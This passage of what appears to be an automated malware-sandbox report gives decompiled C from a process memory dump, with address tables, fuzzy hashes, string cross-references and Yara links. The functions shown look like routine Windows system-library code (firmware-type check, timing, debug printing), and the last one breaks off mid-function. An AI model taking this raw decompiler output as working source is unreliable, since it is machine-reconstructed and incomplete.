0x018de7b9
0x018de7c7
0x018de806
0x00000000
0x018de7c9
0x018de7d1
0x018de7d8
0x00000000
0x018de7d8
0x00000000
0x00000000
0x018de722
0x018de72e
0x018de748
0x018de74c
0x018de754
0x018de756
0x018de75c
0x018de75c
0x00000000
0x018de75c
0x018de758
0x018de758
0x00000000
0x018de758
0x018de750
0x00000000
0x00000000
0x018de752
0x00000000
0x018de752
0x018de730
0x018de735
0x018de73d
0x018de73f
0x00000000
0x00000000
0x018de741
0x018de741
0x00000000
0x018de741
0x018de739
0x00000000
0x00000000
0x018de73b
0x00000000
0x018de73b
0x018de722
0x018de720
0x018de6b0
0x018de618
0x00000000
0x018de618

Strings

`, xrefs: 018DE670
`, xrefs: 018DE5D7

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 3cb68a96dc806d714eef8009cea0f36658853ab6df3d3175f3289ceeae733db6
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: E99190716043469FE764CE29C841B1BBBE5FF84714F18892DFA99CB280E774EA04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 018951BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E018951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18f05f0);
				E0186D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0182EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E018953CA(0);
						return E0186D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0185F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01833690(1, _t117, 0x17f1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0185AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01834620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0185AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0189500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01859860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x018951be
0x018951c3
0x018951c8
0x018951cd
0x018951d0
0x018951d3
0x018951d8
0x018951db
0x018951de
0x018951e0
0x018951e3
0x018951e6
0x018951e8
0x01895342
0x01895351
0x01895356
0x0189535a
0x01895360
0x01895363
0x01895366
0x01895369
0x01895369
0x0189536b
0x0189536b
0x01895370
0x018953a3
0x018953a4
0x018953a6
0x018953ab
0x018953ab
0x018953ae
0x018953ae
0x018953b5
0x018953bf
0x018953bf
0x01895375
0x01895396
0x018953a0
0x018953a0
0x00000000
0x01895396
0x01895377
0x01895379
0x0189537f
0x0189538c
0x01895390
0x00000000
0x01895390
0x018951ee
0x018951f1
0x01895301
0x01895310
0x01895315
0x01895318
0x0189531b
0x01895320
0x0189532e
0x01895331
0x00000000
0x01895331
0x01895328
0x01895329
0x00000000
0x01895329
0x018951fa
0x01895235
0x01895236
0x01895239
0x0189523f
0x01895240
0x01895241
0x01895242
0x01895246
0x01895247
0x0189524e
0x01895251
0x01895267
0x01895269
0x0189526e
0x0189527d
0x0189527e
0x01895281
0x01895282
0x01895287
0x01895288
0x0189528a
0x0189528f
0x01895294
0x00000000
0x00000000
0x0189529a
0x0189529c
0x0189529e
0x0189529e
0x018952a4
0x018952b0
0x00000000
0x00000000
0x018952ba
0x018952bc
0x018952bc
0x018952d4
0x018952d9
0x018952dc
0x018952e1
0x00000000
0x00000000
0x018952e7
0x018952f4
0x00000000
0x018952f4
0x01895270
0x00000000
0x01895270
0x018951fc
0x018951fd
0x01895202
0x01895203
0x01895205
0x0189520a
0x0189520f
0x00000000
0x00000000
0x0189521b
0x01895226
0x0189522b
0x0189521d
0x0189521d
0x01895222
0x01895222
0x0189522d
0x00000000

Strings

UEFI, xrefs: 0189521D
Legacy, xrefs: 01895226

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 584083914c5971fd77a598a5825857064b4ccb1b3a0c32149f97fd8bab6d3123
Instruction ID: 8eca90fc81be7ceaab98ad4f2ced20a5a8c80733271b01ce9c7b2fd767523600
Opcode Fuzzy Hash: 584083914c5971fd77a598a5825857064b4ccb1b3a0c32149f97fd8bab6d3123
Instruction Fuzzy Hash: 8B518071E006099FDF16DFA8C950AAEBBF8FF49704F18406EE649EB251D6719A00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0183B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0183B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x190d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01837D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E018E8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01859E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0185B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0185CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01837D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E018E8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0185AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1908628; // 0x0
								_v68 = _t77;
								_t78 =  *0x190862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1908628; // 0x0
							_t116 =  *0x190862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0183b94c
0x0183b956
0x0183b95c
0x0183b95e
0x0183b964
0x0183b969
0x0183b96d
0x0183b96d
0x0183b970
0x0183b974
0x0183b97a
0x0183badf
0x0183badf
0x0183bae2
0x0183bae4
0x0183bae6
0x0183baf0
0x01882cb8
0x0183baf6
0x0183baf6
0x0183baf6
0x0183bafd
0x0183bb1f
0x0183bb1f
0x0183baff
0x0183bb00
0x0183bb00
0x0183bb03
0x0183bb03
0x0183bacb
0x0183bacf
0x0183bad0
0x0183bad1
0x0183badc
0x0183badc
0x0183b980
0x0183b980
0x0183b988
0x0183b98b
0x0183b98d
0x0183b990
0x0183b993
0x0183b999
0x0183b99b
0x0183b9a1
0x0183b9a5
0x0183b9aa
0x0183b9b0
0x0183b9bb
0x0183b9c0
0x0183b9c3
0x0183b9ca
0x0183b9cc
0x0183b9cf
0x0183b9d3
0x0183b9d7
0x0183ba94
0x0183ba94
0x0183ba98
0x0183baa3
0x01882ccb
0x0183baa9
0x0183baa9
0x0183baa9
0x0183bab1
0x01882cd5
0x01882cdd
0x01882cdd
0x0183babb
0x0183babc
0x0183bac2
0x0183bac3
0x0183bac3
0x0183bac6
0x00000000
0x0183b9dd
0x0183b9dd
0x0183b9e7
0x0183b9e7
0x0183b9ec
0x0183b9ec
0x0183b9f1
0x0183b9f5
0x0183b9fa
0x0183ba00
0x0183ba0c
0x0183ba10
0x0183ba10
0x0183ba12
0x0183ba18
0x00000000
0x00000000
0x0183bb26
0x0183bb26
0x0183ba1e
0x0183ba1e
0x0183ba23
0x0183ba25
0x0183ba2c
0x0183ba30
0x0183ba35
0x0183ba35
0x0183ba41
0x0183ba46
0x0183ba4c
0x0183ba50
0x0183ba54
0x0183ba6a
0x0183ba6e
0x0183ba70
0x0183ba74
0x0183ba78
0x0183ba7a
0x0183ba7c
0x0183ba8e
0x0183ba90
0x0183ba92
0x0183bb14
0x0183bb14
0x0183bb16
0x0183bb16
0x00000000
0x0183ba7c
0x0183bb0a
0x0183bb0d
0x00000000
0x00000000
0x00000000
0x0183bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0183B9A5

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 8a2a3934bd896fedbd681681a6a70336b523058fe19a0c32757c063ae8ed9d6f
Instruction ID: c40bf87ed7b5227d3aa96dc4a8323927f1c8422534f9a3d28baa072795320699
Opcode Fuzzy Hash: 8a2a3934bd896fedbd681681a6a70336b523058fe19a0c32757c063ae8ed9d6f
Instruction Fuzzy Hash: 925135B1A09745CFC725DF28C48092ABBE5BBC8714F18896EE985C7345D730EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0181B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0181B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x18ef7a8);
				E0186D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0186D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0185D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0185F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0186DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0185B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0185B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0185E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0185A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0181b171
0x0181b171
0x0181b171
0x0181b171
0x0181b171
0x0181b176
0x0181b17b
0x0181b180
0x0181b186
0x0181b18f
0x0181b198
0x0181b1a4
0x0181b1aa
0x01874802
0x01874802
0x01874805
0x0187480c
0x0187480e
0x0181b1d1
0x0181b1d3
0x0181b1de
0x0181b1de
0x01874817
0x0187481e
0x01874820
0x01874822
0x01874822
0x01874824
0x01874824
0x0187482a
0x00000000
0x00000000
0x01874835
0x0187483a
0x0187483d
0x0187483f
0x01874842
0x01874842
0x01874842
0x01874846
0x0187484c
0x0187484e
0x01874851
0x01874851
0x01874853
0x01874854
0x01874854
0x01874858
0x0187485a
0x0187485a
0x0187485d
0x0187485f
0x01874861
0x01874861
0x01874866
0x0187486b
0x0187486e
0x01874871
0x01874876
0x01874876
0x01874878
0x0187487b
0x01874884
0x01874884
0x00000000
0x0187487d
0x0187487d
0x01874882
0x01874889
0x01874889
0x0187488f
0x01874891
0x018748e0
0x018748e2
0x018748e4
0x018748e4
0x018748e7
0x018748e7
0x018748ed
0x018748f4
0x018748f6
0x01874951
0x01874951
0x01874953
0x01874953
0x01874956
0x01874956
0x01874958
0x01874959
0x01874959
0x0187495d
0x0187495d
0x0187495f
0x0187495f
0x01874965
0x01874969
0x018749ba
0x018749ba
0x018749c1
0x018749c5
0x018749cc
0x018749d4
0x018749d7
0x018749da
0x018749e4
0x018749e5
0x018749f3
0x01874a02
0x00000000
0x01874a02
0x01874972
0x01874974
0x00000000
0x00000000
0x01874976
0x01874979
0x01874982
0x01874983
0x01874984
0x0187498b
0x0187498d
0x01874991
0x01874993
0x01874999
0x0187499d
0x018749a2
0x018749a2
0x018749a2
0x01874999
0x018749ac
0x00000000
0x018749b3
0x018748f8
0x018748fe
0x00000000
0x00000000
0x00000000
0x018748fe
0x01874895
0x0187489c
0x018748ad
0x018748b2
0x018748b5
0x018748b7
0x018748ba
0x018748bc
0x018748c6
0x018748c6
0x018748cb
0x018748d1
0x018748d4
0x018748d8
0x018748d8
0x00000000
0x018748d8
0x018748be
0x018748c0
0x00000000
0x00000000
0x018748c2
0x00000000
0x00000000
0x00000000
0x018748c4
0x00000000
0x01874882
0x0187487b
0x01874904
0x01874906
0x00000000
0x00000000
0x01874908
0x0187490e
0x00000000
0x00000000
0x01874910
0x01874917
0x01874917
0x00000000
0x01874917
0x0181b1ba
0x018747f9
0x018747fc
0x00000000
0x00000000
0x00000000
0x018747fc
0x0181b1c0
0x0181b1c0
0x0181b1c3
0x0181b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 018748AD

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 064b29270e1390e42ec3db642f049e80a2597022e12ad5cddc7fc170ccb54a95
Instruction ID: 3c5f7143fcbe9317dd3e3a2739dea1b6a980f86b8f0806bc0801e392eddcfa81
Opcode Fuzzy Hash: 064b29270e1390e42ec3db642f049e80a2597022e12ad5cddc7fc170ccb54a95
Instruction Fuzzy Hash: 3451BF71D0025A8FEB31CF68C844BAEBBB1EF05714F1142A9E859EB292D7718A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01842581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E01842581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912128) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t252;
				signed char _t256;
				signed char _t257;
				signed int _t260;
				signed int _t262;
				intOrPtr _t264;
				signed int _t267;
				signed int _t274;
				signed int _t277;
				signed int _t285;
				intOrPtr _t291;
				signed int _t293;
				signed int _t295;
				void* _t296;
				signed int _t297;
				unsigned int _t300;
				signed int _t304;
				signed int* _t305;
				signed int* _t306;
				signed int _t307;
				signed int _t311;
				intOrPtr _t323;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t339;
				signed int _t340;
				signed int _t344;
				signed int _t346;
				signed int _t349;
				signed char _t350;
				signed char _t352;
				void* _t353;

				_t346 = _t349;
				_t350 = _t349 - 0x4c;
				_v8 =  *0x190d360 ^ _t346;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t339 = 0x190b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t300 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t353 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t291 = 0x48;
				_t321 = 0 | _t353 == 0x00000000;
				_t332 = 0;
				_v37 = _t353 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t291 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t340 = 0xc0000106;
						goto L32;
					} else {
						_t339 = L01834620(_t300,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t291);
						_v52 = _t339;
						__eflags = _t339;
						if(_t339 == 0) {
							_t340 = 0xc0000017;
							goto L32;
						} else {
							 *(_t339 + 0x44) =  *(_t339 + 0x44) & 0x00000000;
							_t50 = _t339 + 0x48; // 0x48
							_t334 = _t50;
							_t321 = _v32;
							 *((intOrPtr*)(_t339 + 0x3c)) = _t291;
							_t293 = 0;
							 *((short*)(_t339 + 0x30)) = _v48;
							__eflags = _t321;
							if(_t321 != 0) {
								 *(_t339 + 0x18) = _t334;
								__eflags = _t321 - 0x1908478;
								 *_t339 = ((0 | _t321 == 0x01908478) - 0x00000001 & 0xfffffffb) + 7;
								E0185F3E0(_t334,  *((intOrPtr*)(_t321 + 4)),  *_t321 & 0x0000ffff);
								_t321 = _v32;
								_t350 = _t350 + 0xc;
								_t293 = 1;
								__eflags = _a8;
